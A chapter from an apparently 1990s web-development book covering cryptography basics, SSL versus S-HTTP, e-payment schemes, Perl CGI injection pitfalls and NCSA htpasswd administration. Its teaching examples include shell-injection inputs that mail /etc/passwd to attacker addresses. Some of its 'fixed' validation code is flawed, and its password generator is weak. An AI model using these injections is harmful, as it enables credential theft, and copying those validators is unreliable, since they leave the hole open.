Chapter 25

Transaction Security and Security Administration


CONTENTS


Security is a concept quite topical in an Internet that is becoming ever more commercialized. Rival security software schemes battle for control over tomorrow's electronic payment-transaction systems, legal experts worry about what constitutes a nonrepudiation digital signature, and financial service firms worry about malicious Internet entities sniffing out their data packets as they flow from node to node.

In the past, cryptographic techniques were centered around repulsing Cold War-style enemy computational attacks on critical network data; nowadays, the interest centers around applying the same numerical methods to real-time transactions involving dollars and cents. From the web developer's point of view, the first point of order should be to understand the basic vocabulary.

The first section of this chapter helps build this vocabulary by covering the building blocks of Web security: Privacy Enhanced Mail (PEM) and its cousin RIPEM, Pretty Good Privacy (PGP), RSA Public-Key Cryptography, Data Encryption Standard (DES), and Digital Signatures. This gives you a good starting place to explore more deeply specific Web-security topics: Netscape Communication Corporation's Secure Sockets Layer (SSL) specification, the competing Secure HTTPD (SHTTPD) proposal championed by Enterprise Integration Technologies (EIT), the chief concepts underlying various electronic payment systems such as GOST's NetCheque and Digicash's e-cash, and Microsoft's security initiatives (the CryptoAPI). These sections give web developers a clear picture of the tools that various software vendors use to build their security systems; in many cases, developers will be using a secure server and no extra steps are necessary. It's still a good idea, however, to be familiar with secure client-server Web transactions, and there are possibilities for intrepid developers to build their own security-enhanced applications.

The intricacies of data encryption and digital signatures have been well covered in the literature and have been well developed by a number of software firms. It therefore is unrealistic for the individual web developer to approach the problem of secure transactions with one quick hack or another. A more sensible approach is to gain familiarity with the pros and cons of the general security approaches on the Web so that, when the time comes, the developer can recommend the appropriate security tool as an integration package with a set of existing Web site applications. Every Web site lies somewhere on the security spectrum-from totally open (no security) to totally battened down with multiple layers of strict security. No single approach is best; a developer (or the site administrator) can make security determinations only after taking into account end-user requirements, computational resource constraints, and legal (compliance) issues, if applicable. Again, a sound familiarity with the security building blocks helps make a reasonable site- or application-specific security choice.

I then move onto important security issues for the Perl CGI developer. The bad news is that many CGI forms are inherently insecure, but the good news is that untrusted data (such as data filled in on the client side) can be cleaned up before security is breached. Use of Perl on the Windows NT platform carries some new risks, which are explored here.

The chapter concludes with a discussion of Web site administrative issues. I cover two security tools that come with the NCSA httpd distribution: the NCSA htpasswd program and the host-filtering technique. Sample scripts, in both Perl and Expect, are presented to facilitate the administration of applications that require the user to log on with a user ID and password. Because the distinction between application developer and site administrator is sometimes an artificial one on the Web, these techniques are indeed useful ones to present.

Cryptographic Terminology

The issue of secure commercial transactions on the Web is a complex one. In order to appreciate the intense struggle for the commercial marketplace, the developer needs core security vocabulary; I present some of the key terms in the following section.

Data Encryption Standard (DES)

The DES standard was adopted by the U.S. government in 1977 and is suitable for encrypting large blocks of data. (See note) Both the sender and receiver must know the same secret key to encrypt and decrypt the message. Computationally, it's difficult but not impossible for an enemy to decrypt an intercepted message without knowledge of the secret key. There is, however, no convenient way over TCP/IP wires to ship the private key to authorized participants.

DES therefore is unsuitable by itself for use on the Internet because a network eavesdropper might compromise the secret key as it is being transmitted. There is a way, though, to use DES effectively, as explained in the next section on RSA public-key cryptography.

RSA Public-Key Cryptography

Public-key cryptography, invented in 1976 by Whitfield Diffie and Martin Hellman, solves the network security problem inherent in traditional symmetric cryptographic methods. Consider the case of the sender and the recipient sharing the same secret key (a symmetric key system). It is difficult to communicate this common key over a transmission medium (for example, a telephone line or TCP/IP network) without a significant risk of an unwanted third party compromising the key. If the key is compromised, all subsequent messages in either direction can be decoded by the interloper.

Public-key cryptography is asymmetric; each person who wants to share secure information on the network is given one public key and one private key. The private keys are never transmitted on the network. If an encrypted message is sent, the sender's public key is transmitted along with the message, and only the recipient's private key can be used to decrypt it. Therefore, the message can be sent on an insecure transmission medium-for example, the Internet-and eavesdroppers who sniff out the data packets can't benefit because they don't possess the recipient's private key.

In passing, I note here that HotJava, Sun Microsystems' new Web browser, has announced plans to support network commerce by using public key encryption technology. (See note)

An important related concept is the digital signature. The sender uses his or her private key and the contents of the message itself, and pipes these two pieces of data into an algorithm. The output of the algorithm is the digital signature, which is relatively short (a few hundred bytes long). The recipient can verify the digital signature by using the sender's public key and the message. The digital signature is secure in the sense that it would be virtually impossible for an "enemy" computer to find another message (that is, one distinct from the message actually sent) to produce the identical digital signature; the task is beyond realistic computational limits. Because each user has the responsibility of protecting the private key, the digital signature is nonrepudiatable; senders can't claim that they did not send the message in question.

It's important to realize that, unlike DES, RSA is not an efficient way to encrypt large blocks of data. Therefore, a good hybrid approach to securely transmit a large amount of data is to encrypt the data with DES and then encrypt the DES secret key with the receiver's RSA public key.

Kerberos

The Kerberos network authentication system was developed at MIT in 1985 and 1986. (See note) Dr. Barry Neuman of Digicheque (an electronic payment system discussed briefly later in this chapter) fame, now at the University of Southern California, was one of the principal designers. Kerberos provides tickets (for network identification) and secret cryptographic keys (for secure network communication) to users or services on the network. The ticket, a few hundred characters long, is embedded in network protocols such as FTP or Telnet, and is used with the secret keys to mutually authenticate a network connection. The RSA Labs FAQ points out that Kerberos keeps a central database of the secret keys; therefore, in contrast to a digitally signed message provided by RSA technology, a Kerberos-authenticated message would not be legally secure. The sender could claim that the central database had been compromised.

Pretty Good Privacy (PGP) and Privacy-Enhanced Mail (PEM)

Both PGP and PEM are programs to communicate securely on the network; they both use RSA encryption techniques. The U.S. government controls the export of RSA encryption technology and, in fact, classifies some of the algorithms in the same category as munitions. Munitions often wind up in the wrong place, though, and so do the RSA code and applications that use it, such as PGP and PEM. These packages have found their way to Europe and Asia.

PGP, according to author Phil Zimmerman, is now a "worldwide de-facto standard for e-mail encryption" and can handle other kinds of data transfer as well. A commercial concern, ViaCrypt, sells the commercial version of PGP; in addition, an Internet version is freely available. (See note)

NCSA httpd and PGP/PEM

Some work has been done to implement both PGP and PEM protocols with the NCSA httpd server and the NCSA Mosaic client-having the server and the client "hook" into the RSA encryption routines to implement security. The initial work, however, did not establish a certificate authority or a trusted public key repository, so the developers did not have a simple solution for how the sender and recipient could exchange their public keys with certainty. If a bogus public key is forged and accepted by a recipient, the forger can send bogus e-mail using the false public key and fool the recipient. For a more mature outlook on this theme, see the section "Secure NCSA httpd."

Riordan's Privacy-Enhanced Mail (RIPEM)

Mark Riordan has written RIPEM, a software package to "sign" documents or data, and to encrypt and decrypt them. The RIPEM package allows users to do the following: (See note)

RIPEM, because it uses RSA code, is subject to the same export restrictions as PGP and PEM. It has been ported to many platforms (UNIX, Microsoft Windows, Macintosh, and so on) and is supported by some popular mail packages-for example, the freely available Gnu Emacs mail program and Elm.

The fingerprint is a variant of the digital signature discussed previously in the RSA section. It also is called MD5, and it is present, for example, in a RIPEM-enhanced FTP file. The sender's public key can be used to decrypt the MD5 fingerprint (and this public key is available from the RIPEM repository or by issuing a blind Finger command to the sending machine). The fingerprint is encrypted within the sender's private key and can't be forged by network eavesdroppers. Again, as with RSA, the basic security precaution is for all network participants to securely store their private keys. RIPEM never transmits them over TCP/IP wires. RIPEM is quite different from PGP; they are noninteroperable. Over time, standards committees might address the issue of differences among the range of Internet security offerings and find a middle ground to bring the packages closer together.

It's time for a practical example! Figure 25.1 shows an FTP document received by a Web client from the Internet Multicasting Service's town.hall.org machine.

Figure 25.1 : A corporate filing, retrieved by FTP from the IMS town.hall.org machine. Note the MD5 fingerprint at the top of the document.

This is an interesting example of RIPEM document fingerprinting. The IMS, anticipating public policy questions such as, "How can we be sure that the corporate filing we retrieve over the Internet is indeed the same one you are storing on your system?" is answered by this process:

Note that without the client RIPEM software installed, the fingerprint can't be processed. An interesting empirical finding is that users have reported RIPEM validation failure after doing a File Save As on a filing using a Web browser; the File Save As procedure quite possibly could alter one or more bytes (for example, it might lose a line feed character). If the filing is FTPed from the town.hall.org site, however, the RIPEM validation runs cleanly.

Netscape Communication Corporation's Secure Sockets Layer (SSL)

The Netscape SSL protocol is designed to fit between application protocols such as HTTP, Network News Transfer Protocol (NNTP), FTP, Telnet, and the TCP/IP network backbone.

Simply put, the Netscape Navigator browser has a new URL access method, https, to connect to Netscape servers using SSL. The URL would be specified as https://machine/path/file, and the default port number for the client/server connection is 443 (rather than port 80 for generic HTTP). (Just in case you were wondering, the new port was assigned by the Internet Assigned Numbers Authority, or IANA.) Just as with RSA code, the SSL cryptographic scheme is subject to export restrictions, and the key size is limited to 40 bits. The Netscape standards documentation estimates that a message encrypted with a 40-bit key would take a 64-MIPS machine one full year of dedicated processor time to break, which isn't computationally secure but safe enough for most commercial customers. For U.S. customers, the Netscape server uses a 128-bit encryption key that is many orders of magnitude more secure than the 40-bit key.

SSL's role in a client/server connection is to encrypt outbound and decrypt inbound packets of a protocol-specific datastream (for example, HTTP, FTP, or Telnet). Therefore, network eavesdroppers always would see fully encrypted data packets, whether they are credit card numbers or HTTP authorization information such as user IDs and passwords (see the following section on NCSA htpasswd).

Recently, Netscape has developed a Secure Sockets Library that emulates the sockets API supported by UNIX, Macintosh System 7, and Microsoft Windows. Its developers have integrated the SSL into the Winsock 2.0 specification, so programmers used to the Winsock specification easily can take advantage of SSL functions. Developers can take existing applications that are Winsock-compliant and convert them with a minimum of trouble to a secure version.

These proactive enhancements to the Secure Sockets Layer are a strong sign that Netscape very much wants SSL to become the dominant security protocol. Netscape has submitted SSL to the W3C working group on security; the jury is still out on its status.

Secure NCSA httpd

Three familiar players in web development-Enterprise Integration Technologies (EIT), RSA Labs, and the National Center for Supercomputing Applications (NCSA)-offer an extension to httpd: Secure NCSA httpd.(See note)

On the server side, an SHTTPD server can be configured through special SHTTP header directives and local server configuration files. On request, the server uses the RSA private key to generate a digital signature, and this signature, along with the server's public key certificate, is delivered to the client. The client uses the certificate to verify the digital signature. Control of server signature and/or encryption can be via CGI program SHTTP message headers.

On the client side, there is Secure WWW browser software, which can submit secure requests with a client public key. The Secure httpd server uses the client public key to verify the client request and then can decrypt it.

Extra CGI environmental variables now are available for web developers who want to write CGI programs in the Secure NCSA httpd environment. Web developers can query the security properties of an incoming client request. They can ask questions such as, "Is it signed (and if so, who is the signer)," "Is it encrypted," and "What is the client public key?"

In general, the SHTTP protocol purposefully stays within narrow boundaries; it defines new security message headers and therefore enhances the HTTP protocol, which governs communications between WWW client and server. The specification is nonproprietary, but the first reference implementation contains licensed code from EIT, RSA, and NCSA. (See note) The reference implementation includes a secure browser-Secure NCSA Mosaic-as well as a secure server-Secure NCSA httpd. Because the entire concept rests on public key cryptography, it is necessary to create an authority (CommerceNet in the EITH-NCSA-RSA effort) to certify member keys.

As the FAQ states, EIT is not curtailing independent efforts to develop other implementations of SHTTP. On the contrary-third parties are welcome to develop client/server applications that support the SHTTP protocol. SHTTP pays attention to interoperability issues; the protocol supports RSA cryptographic standards, PEM, and clients and servers using different standards. Because RSA code is not available for unrestricted export, Europeans might have to use weaker (shorter) keys, and SHTTP can handle the key-size mismatch.

Comments on the SHTTP Protocol and SSL from a Developer's Perspective

There is a major war between the formidable corporate forces backing SHTTP (EIT and CommerceNet) and the equally daunting Netscape Communications Corporation's Secure Sockets Layer specification. Both ideas have strong technical foundations, but there is no clear consensus yet on which technique will achieve "most favored status" with the evolving WWW security standards. Taking into consideration the murky atmosphere of this conflict, I recommend that the web developer straddle the fence and read source material on both proposals. In general, it should not be too difficult to implement a client/server application using SHTTP protocol, because the CGI extensions make intuitive sense. Developers who want to experiment with SSL will face a steeper learning curve, but this might be time well spent if standards committees decide on SSL as the basis for next-generation Web security.

Electronic Commerce-Security Considerations

Instead of bemoaning the commercialization of the Internet, some groups want to control its basic operations-the standards by which payment is transferred electronically between buyer and seller. It is useful to review briefly the security ideas underlying the major factions. From the developer's standpoint, this information is useful, because one day an application might have to integrate into third-party commerce software, so a little glimpse into the modus operandi of electronic commerce software is called for here.

NetCheque and NetCash

Barry Neuman, in conjunction with Gennady Medvinsky at the University of Southern California's Global Operating Systems Technology (GOST) group, has developed NetCheque, which is billed as "well suited for clearing micropayments." Why? Because NetCheque uses the Kerberos authentication algorithm to verify digital signatures on the electronic checks, and the argument here is that conventional cryptography techniques of Kerberos are more computationally efficient (that is, faster) than public key cryptographic systems. Neuman et al. envision an Internet of millions of micropayments where response time is of the essence. Naturally, critics would argue that the security of public-key systems is greater (see the previous discussion on Kerberos). NetCash is billed as an untraceable financial instrument that preserves the participants' anonymity; buyers and sellers can choose NetCheque or NetCash, depending on the level of anonymity desired. The trade-off for anonymity is that more computational resources are required of the currency server.

The authors argue that the efficiency of NetCheque will lead to Internet services "that charge small fees, on the order of pennies, for access to information, processing queries, and consumption of resources. Such services are a critical component of electronic commerce." (See note)

First Virtual

The novelty in First Virtual Holdings' approach to the security problem of transmitting credit card and other sensitive data across the Internet is that they don't! FV handles credit card clearing off-line with the information technology resources of Electronic Data Systems (EDS), Inc. Therefore, it avoids the issue of encryption, public-key or otherwise, by circumventing the issue. Buyers and sellers register with FV, and FV handles the clearance of information product transactions. If buyers declare that they are not satisfied with the information product, the transaction is voided. And, because it is an information product (such as software) and not a physical good, the marginal cost to the seller of buyer dissatisfaction is very low.

The bright side of FV is zero security risk; the dark side of its scheme is its high transaction cost. It bills a 29-cent fee and two percent of the transaction cost to the buyer for each transaction, and it bills sellers $1 for each aggregated deposit that is made to their account. (See note)

A final note about FV: Nathaniel Borenstein, the primary author of the famous Internet MIME standard, is FV's chief scientist.

Figure 25.2 shows the First Virtual home page.

Figure 25.2 : First Virtual Holdings, Incorporated wants to be your electronic commerce provider.

Digicash's E-Cash

David Chaum is another computer science titan (I'm not just saying this because he taught at NYU) who, with shades of Nathaniel Borenstein, would like to take a substantial market share in the realm of electronic payment. Chaum's company, Digicash, has an entirely different scheme in mind than First Virtual or NetCheque, however.(See note) The Digicash vision of E-cash is that of a digital signature-yes, he proposes using public-key cryptography.

A bank can furnish its public key to all participants, for example. Then, any message from the bank, encoded with the bank's private key, can be decoded by the recipient(s).

To purchase an item, the buyer generates a random number (using Digicash software) and then the number is "blinded" and transmitted to the bank. The bank authenticates the transmission, debits the money from the buyer's account, and digitally signs the blinded note. A confirmation is sent back to the user and the digitally signed bank authorization is forwarded to the seller. The seller can verify the bank's digital signature and the buyer can unblind the confirmation.

Digicash has anticipated the security loophole of having an unethical user try to spend the same "note" twice by having the seller's machine issue an unpredictable (that is, always changing) challenge to the buyer's machine. The response does not reveal the buyer's identity. On the second go-round, though, the challenge response does expose the user's fraud.

From a public policy viewpoint, the blinding process means payment anonymity. More so than with conventional cash or checks, the seller cannot trace the payment back to the buyer.

The marketing challenge, naturally, is whether Chaum et al. can convince a leery public that their cryptographic methods are truly secure and that it makes sense economically to choose this method instead of the credit card off-line approaches of First Virtual, for example.

Digicash's initial strategy is to download its E-cash software to sellers and buyers; transfer of CyberBucks (its term) is handled by the software. It has created an E-cash logo for compliant electronic shops. Once again, though, this battle is in its initial stages.

Microsoft's Security Initiatives

Microsoft has been quite busy in 1996 writing Internet draft security proposals and public white papers on a series of related topics. (See note) It might seem surprising that Microsoft, given its history of proprietary software solutions, would be so aggressive in the public arena on security, but this is consistent with its recent reorganization, which focuses on winning Web market share (both server and client) from Netscape. If Microsoft can push its protocols in a public forum and gain acceptance, it also will win over third-party developers and create a snowball effect. The situation is quite paradoxical: the Web is billed as a sandbox where everybody can play, yet individual vendors somehow must distinguish themselves as offering technically superior solutions. This section examines three of Microsoft's major security fronts: the Cryptographic API (CryptoAPI) toolkit for simple end-user cryptography, the Secure Electronic Transactions (SET) framework for Internet commerce, and code-signing specifications set so that software consumers can trust downloaded software programs as if they were shrink wrapped and purchased at a retail outlet.

The CryptoAPI toolkit  Microsoft distinguishes tools available to the developer (the CryptoAPI) from the numerical cryptographic functions, such as key generation, digital signatures, and message hashing. It isolates the functions into separate modules, called Crytographic Service Providers (CSPs). Therefore, the mathematical details are abstracted away from the developer and, furthermore, several CSPs can be registered for use. Interchangeability of CSPs is important to give the developer maximum flexibility. In certain situations, for example, a software-based (algorithmic) CSP can be used, whereas for even more security, a second hardware-based (smart cards) CSP might be chosen. Microsoft will build a default CSP into the operating system-an in-house variant of RSA public-key technology.

The Secure Electronic Transactions (SET) framework  SET is a protocol to allow bank-card payments over the Internet. The SET protocol was introduced by MasterCard and VISA, with technical assistance from Microsoft, Netscape, IBM, GTE, and other major companies. The white paper, at http://www.visa.com/cgi-bin/vee/sf/set/intro.html, indicates that the major proponents will provide reference code in late 1996 so that other credit-card companies can implement the SET protocol, for example. SET uses digital certificates to authenticate the bank-card holder, the merchant, and the merchant's financial institution-all the parties in an electronic transaction. Microsoft targets 1997 as the first year in which end-user SET compliant software will be available.

Code-signing specifications  Microsoft has built code-signing support into its Web browser-Internet Explorer versions 3 and higher. The software vendor can use tools (which still are in their initial forms-for example, in Microsoft's ActiveX Software Development Kit) to sign the code. The social reasons for the code-signing procedure are two-fold: to provide accountability (authorship) and consumer peace of mind (the underlying cryptographic techniques verify that the code has not been tampered with between the time it was signed and the time the Web browser downloaded it). Microsoft has indicated that all its development tools are slated to be augmented with a code-signing function.

Comments on Electronic-Payment Systems

A fascinating and frenetic conflict is raging, with many millions of dollars at stake. I advise the web developer to try to code simple applications that can hook into one or more schemes without becoming beholden to any one scheme. The dust is far from settled here; the differences and the stakes are orders of magnitude greater than the SHTTP versus SSL war that I discussed earlier in this chapter.

I only hope that nonproprietary (fully open) standards will rule the day in the security arena-a win-win situation for vendors and developers who all have equal access to the security protocol (export restrictions notwithstanding) and the underlying HyperText Transfer Protocol.

Now the discussion turns to more practical, immediate matters for the CGI Perl developer: how to avoid falling into common Web security traps and how to use the inherent security properties of the NCSA httpd server.

Security Pitfalls of CGI Programming

The most common mistake a CGI programmer can make is to trust the data the user is inputting into a CGI form. Often, the CGI forms fork a subshell; for example, the following line might be present in a form-mail program:

system("/usr/lib/sendmail $form_address < $input_file");

The problem is that the system call starts a subshell; however, there is no guarantee that the $form_address variable cannot be manipulated by a malicious user to do a lot more than the programmer bargained for. Consider this value of $form_address:

"legit-id@good.box.com;mail badguy@badguy.box.com < /etc/passwd"

In this case, the bad guy has used the semicolon to append a command to mail himself the system's password file.

The general rule is that you should not fork a subshell if the CGI script is passing untrusted data to it. In Perl, the system command is not the only possible culprit; the following commands also invoke a shell: (See note)

Opening to a pipe  For example, open(OUT, "|program $prog-args");

Commands in backticks  For example, 'program $args';

The exec statement  For example, exec("program $args");

Therefore, the CGI programmer can sidestep problems by keeping these two practices in mind:

Do not pass untrusted data to the shell.
In programs that run externally with arguments, check the arguments to make sure that they do not contain metacharacters.

Guarding against the traps posed by untrusted data is analogous to the security methods built into Perl 5 setuid scripts (scripts that run with the privileges of the owner). In Perl 5 setuid scripts, any command-line argument, environmental variable, or input is defined as tainted, and as the Perlsec manual page says, "may not be used directly or indirectly, in any command that invokes a subshell, or in any command that modifies files, directories, or processes." In the CGI world, it is desirable to force taint checks; in Perl 5, the -T command-line flag is used when starting the Perl interpreter. The Perlsec manual page shows how to follow my advice; for example, I replace this line:

system "echo $foo"; # insecure, $foo is tainted

with this line:

system "/bin/echo", $foo # secure, does not use shell

I do not trust the assignment

$path = $ENV{'PATH'};

Instead, I explicitly set the path in the script with a line such as this:

$ENV{'PATH'} = '/bin:/usr/bin';

Paul Phillips provides the following example, which is part of a CGI mail form:

open(MAIL, "|/usr/lib/sendmail -t");
print MAIL "To: $recipient\n");

The $recipient variable is untrusted, so I should check this variable for shell metacharacters first by using this code:

unless $recipient =~ /^[a-zA-Z_@]*/) {
    print "Failed validation check!";
    print "Invalid characters used in recipient : $recipient";
    exit 1;
}

Tip
The developer is responsible for devising the proper regular expression to scan for shell metacharacters; note that this is very much dependent on the given shell! It is also highly operating-system specific. Servers running Windows NT will have an entirely different range of suspicious characters than UNIX machines, for example.

Eric Tall tested the readers by passing untrusted data to an external program in Chapter 24's make_button Perl script. Now he will fix it for us. Consider the following lines from make_button.pl:

# See Chapter 24 for a discussion of the following statement.
$text =~ s/[^a-z][^A-Z][^0-9]//g;
if($text ne "")
{eval 'pbmtext "$text" |pnmcrop -white |pnmpad -white -t3 -b3 -l3 -r3 \
      |pnminvert> $text_pbm';
 eval 'anytopnm $text_pbm | pnmscale -xsize $xs -ysize $ys >$text_file';
 eval 'pnmarith -a $text_file $button_file | ppmtogif>$write_name';
}
else
{ eval 'ppmtogif $button_file >$write_name'; }

The first code line strips out all characters except letters and digits. What could happen without this statement? In the third line, the $text variable is passed as a command-line argument to the pbmtext program in a Perl eval statement. Suppose that a malicious user passes the following in the $text variable:

x' cat /etc/passwd>password.file

This command indeed executes; the pbmtext program only expects one argument and ignores the extra text on the command line, and the rest of the statement executes. In fact, nothing even shows up in the error_log.

The user can execute the script again-this time, passing the following in the $text variable:

x' mail wily@cracker.org<password.file

Our password file has been exported. Our site might come under attack soon-not a pleasant scenario.

In the make_button.pl script, the security hole was easy to cover up by allowing the user to input only letters or digits.

Perl and Windows NT

Perl has been ported successfully to the 32-bit Microsoft Windows NT operating system, (See note) and it is relatively easy to run CGI Perl scripts on NT regardless of the Web server (be it O'Reilly's WebSite, Microsoft's Internet Information Server (IIS), or some other choice). Nevertheless, you should keep in mind an important security concern when running Perl CGI scripts under NT: (See note) Avoid at all costs placing the script interpreter (perl.exe) in the /cgi-bin directory. If the perl.exe program is in the /cgi-bin directory (wherever that might be on the NT box) any Internet client can open a URL and pass arguments directly to the interpreter, in effect establishing an interactive session with unwanted permissions on the server's file system. All sorts of horrific attacks can be mounted: formatting a disk, formatting the hard drive, running an arbitrary binary executable on the server, and so on. This is simple to avoid; take perl.exe (and all other shell interpreters, such as csh, ksh, and so on) out of the /cgi-bin directory and put them into a secure area on the server. Then, use the NT File Manager and associate an extension (*.pl for Perl scripts, for example) with the action perl.exe. The folks at http://www.perl.hip.com/ have developed a DLL to allow Win32 Perl to talk directly to an Internet Server API (ISAPI) extension, PerlIS.dll, that runs much faster than perl.exe. The same advice holds true; place the PerlIS.dll module in a system directory such as \winnt\system32 and associate an extension (*.plx, for example) with the PerlIS.dll. One final usage note for users of Microsoft's IIS: The script directory (typically, \winnt\system32\inetsrv\Scripts\) should be set to execute-only, not read and execute. I have seen cases where IIS running on NT 4.0 echoes the script source code to the screen instead of executing it if the script directory is both read and execute.

A Web Administrative Security Overview

The most important lesson in this chapter is that you should not run your Web server as root! If root owns the Web server, all the CGI scripts that the server launches also are owned by root, and they have root permissions. If a form is manipulated to pass malicious data, a root-owned CGI script can delete the site's data in a second or two. In UNIX, Web servers come with the configuration option of running as user ID NOBODY; heed this clarion call.

This section moves onto security administrative tasks that are made simpler with publicly available tools.

NCSA's htpasswd Scheme

The NCSA server features a simple and elegant password-protection scheme. The core of the program is the simple htpasswd program, which encrypts passwords and adds the password and user name to a password file.

A command-line session using the htpasswd program follows:

htpasswd -c /passwordfiles/passworddata user1
Adding password for user1.
New password: ***
Re-type new password: ***

The -c flag creates a new file in the directory /passwordfiles/. Omit this flag to add a user to an existing file or to change the password for a user.

The password.data file contains [username]:[encrypted password]-one per line:

user1:7YRgBIivSuMhU

The next step is to add a document (traditionally named .htaccess) to the directory that you want to protect, specifying the location of the password file along with other information:

AuthUserFile /passwordfiles/.htpasswd
AuthGroupFile /passwordfiles/.htgroup
AuthName ByPassword
AuthType Basic

<Limit GET>
require group nicepeople
</Limit>

This file also specifies a group that is allowed access, nicepeople, and the name and location of the file that will contain the names of each user within a group. The .htgroup file is formatted similarly to the .htpasswd file-that is, [group]:[name]. For example,

nicepeople:user0
nicepeople:user1 user2 user3
weirdpeople:user4 user5

and so on. The last step is to check that the server is configured properly. The line must be in the srm.conf file:

AccessFileName .htaccess

This simply tells the server to look for the file .htaccess in a directory before serving up documents to the client. If the .htaccess file is found, the user ID and password are requested, as shown in Figure 25.3.

Figure 25.3 : The user name and password input box in Netscape.

Netscape, Mosaic, and other major browsers all show an authorization box similar to that shown in Figure 25.3. If invalid input is entered, a retry box is shown (see Fig. 25.4). Figure 25.4 : An invalid ID/password combination was entered.

The number of retries acceptable by the system can be set by the developer. It is a common phenomenon for users to register for a Web service and then forget their password; naturally, what the application administrator should do when the inevitable telephone call comes is a policy decision.

Returning to the technical discussion of http security administration, it usually is a good idea to add the following line to srm.conf:

IndexIgnore /.htaccess ~

This instructs the server not to list the file in a directory listing URL (what the client sees when requesting a URL that ends with a forward slash (/) when no default file is specified).

There are two advantages to using this method of protecting documents. One is that the root directory as well as all subdirectories that the .htaccess file resides in is protected. This makes it an easy task to password protect any number of documents with little administrative hassle.

The second advantage is that the user name, if supplied with a valid password allowing the user access, is logged to the httpd_log file. For example,

tomr.dialdown.access.net - tomr3 [28/Jun/1995:17:47:43 -0400] "GET
/subscribers/subscribers.html HTTP/1.0" 200 1609

shows that the user tomr3 has entered a proper password and retrieved the document specified. This gives the developer an easy way to track the reading habits of individual users (and explains why more and more commercial sites on the Web are requiring some form of registration).

If the developer uses the Expect package (which is discussed further in the next chapter), it is easy to automate the process of adding user IDs and passwords to access and group files. Listing 25.1 is an adaptation of the mkpasswd script that comes with the Expect distribution. It is called by a METHOD=POST form requesting a name and e-mail address. It uses the e-mail name as a user ID, assigns a randomly generated password, adds them to the group and password files, and then displays the user ID and password to the client.


Listing 25.1. An adaptation of the mkpasswd script.
#!/usr/local/bin/expect
#
#  mkpasswd (adaptation)
#
puts "Content-type: text/html\n"
if {[string compare $env(REQUEST_METHOD) "POST"]==0} {
    set message [split [read stdin $env(CONTENT_LENGTH)] &]
} else {
    set message [split $env(QUERY_STRING) &]
}
foreach pair $message {
    set pair [split $pair =]
    set name [lindex $pair 0]
    set val [lindex $pair  1]
    if {($name=="name") || ($name=="pass")} {
    regsub -all {\+} $val { } val
    # kludge to unescape some chars
    regsub -all {\%0A} $val \n\t val
    regsub -all {\%2C} $val {,} val
    regsub -all {\%27} $val {'} val
    set id($name) $val
    }
}
if {($id(name)=="") || ($id(pass)=="")} {
    puts "<h1>You have not entered the correct information.<br>\
Please try again</h1>"
    exit
}

regexp {^(.+)\@(.+)\.(.+)$} $id(pass) tmp user machine domain
if { $tmp == ""} {
    puts "<h1>You have not entered the correct information.<br>\
Please try again</h1>"
    exit
}

# insert char into password at a random position
proc insert {pvar char} {
    upvar $pvar p
    set p [linsert $p [rand [expr 1+[llength $p]]] $char]
}

proc rand {m} {
    global _ran

    set period 233280
    set _rand [expr $_ran*9301]
    set _ran [expr ($_rand + 49297) % $period]
    expr int($m*($_ran/double($period)))
}

# given a size, distribute between left and right hands
# taking into account where we left off
proc psplit {max lvar rvar} {
    upvar $lvar left $rvar right
    global isleft
    if {$isleft} {
    set right [expr $max/2]
    set left [expr $max-$right]
    set isleft [expr !($max%2)]
    } else {
    set left [expr $max/2]
    set right [expr $max-$left]
    set isleft [expr $max%2]
    }
}

# defaults
set length 8
set minnum 2
set minlower 2
set minupper 2
set verbose 0
set distribute 0
set passfile "/users/alex/.htaccess"
set prog "/users/alex/htpasswd"
set group "/users/alex/.htgroups"

# if there is any underspecification, use additional lowercase letters
set minlower [expr $length - ($minnum + $minupper)]

set lpass ""        ;# password chars typed by left hand
set rpass ""        ;# password chars typed by right hand

set _ran [pid]

# choose left or right starting hand
set initially_left [set isleft [rand 2]]

if {$distribute} {
    set lkeys {q w e r t a s d f g z x c v b}
    set rkeys {y u i o p h j k l n m}
    set lnums {1 2 3 4 5 6}
    set rnums {7 8 9 0}
} else {
    set lkeys {a b c d e f g h i j k l m n o p q r s t u v w x y z}
    set rkeys {a b c d e f g h i j k l m n o p q r s t u v w x y z}
    set lnums {0 1 2 3 4 5 6 7 8 9}
    set rnums {0 1 2 3 4 5 6 7 8 9}
}

set lkeys_length [llength $lkeys]
set rkeys_length [llength $rkeys]
set lnums_length [llength $lnums]
set rnums_length [llength $rnums]

psplit $minnum left right
for {set i 0} {$i<$left} {incr i} {
    insert lpass [lindex $lnums [rand $lnums_length]]
}
for {set i 0} {$i<$right} {incr i} {
    insert rpass [lindex $rnums [rand $rnums_length]]
}

psplit $minlower left right
for {set i 0} {$i<$left} {incr i} {
    insert lpass [lindex $lkeys [rand $lkeys_length]]
}
for {set i 0} {$i<$right} {incr i} {
    insert rpass [lindex $rkeys [rand $rkeys_length]]
}

psplit $minupper left right
for {set i 0} {$i<$left} {incr i} {
    insert lpass [string toupper [lindex $lkeys [rand $lkeys_length]]]
}
for {set i 0} {$i<$right} {incr i} {
    insert rpass [string toupper [lindex $rkeys [rand $rkeys_length]]]
}

# merge results together
if {$initially_left} {
    regexp "(\[^ ]*) *(.*)" "$lpass" x password lpass
    while {[llength $lpass]} {
    regexp "(\[^ ]*) *(.*)" "$password$rpass" x password rpass
    regexp "(\[^ ]*) *(.*)" "$password$lpass" x password lpass
    }
    if {[llength $rpass]} {
    append password $rpass
    }
} else {
    regexp "(\[^ ]*) *(.*)" "$rpass" x password rpass
    while {[llength $rpass]} {
    regexp "(\[^ ]*) *(.*)" "$password$lpass" x password lpass
    regexp "(\[^ ]*) *(.*)" "$password$rpass" x password rpass
    }
    if {[llength $lpass]} {
    append password $lpass
    }
}

if {[info exists user]} {
    if {!$verbose} {
    log_user 0
    }
    if {[file exists $passfile]} {
    spawn $prog $passfile $user
    } else {
    spawn $prog -c $passfile $user
    }
    expect {
    "New password:" {
        send "$password\r"
        exp_continue
    }
    "new password:" {
        send "$password\r"
        exp_continue
    }
    }
}

set fileHandle [open $group a+]
puts $fileHandle "$user:new_user"
close $fileHandle

puts "<h1>Thank you for signing up for our service</h1><hr>"
puts "<h2>Your userid is:  $user<BR>"
puts "Your password is:    $password</h2><hr>"

NCSA's Host-Filtering Method

Another useful tool for the administrator is host filtering-allowing or disallowing access to files based on the remote host name. With the NCSA httpd server, host filtering also can be done with the .htaccess file:

AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName DenyBadUsers
AuthType Basic

<Limit GET>
order deny,allow
deny from all
allow from .au
</Limit>

In this case, there is no password protection on the directory. The /dev/null indicates this; there is no file. The <limit GET> block is used to indicate which hosts will be allowed or denied. In the preceding example, everyone will be denied access except users making requests from the Australian domain, .au.

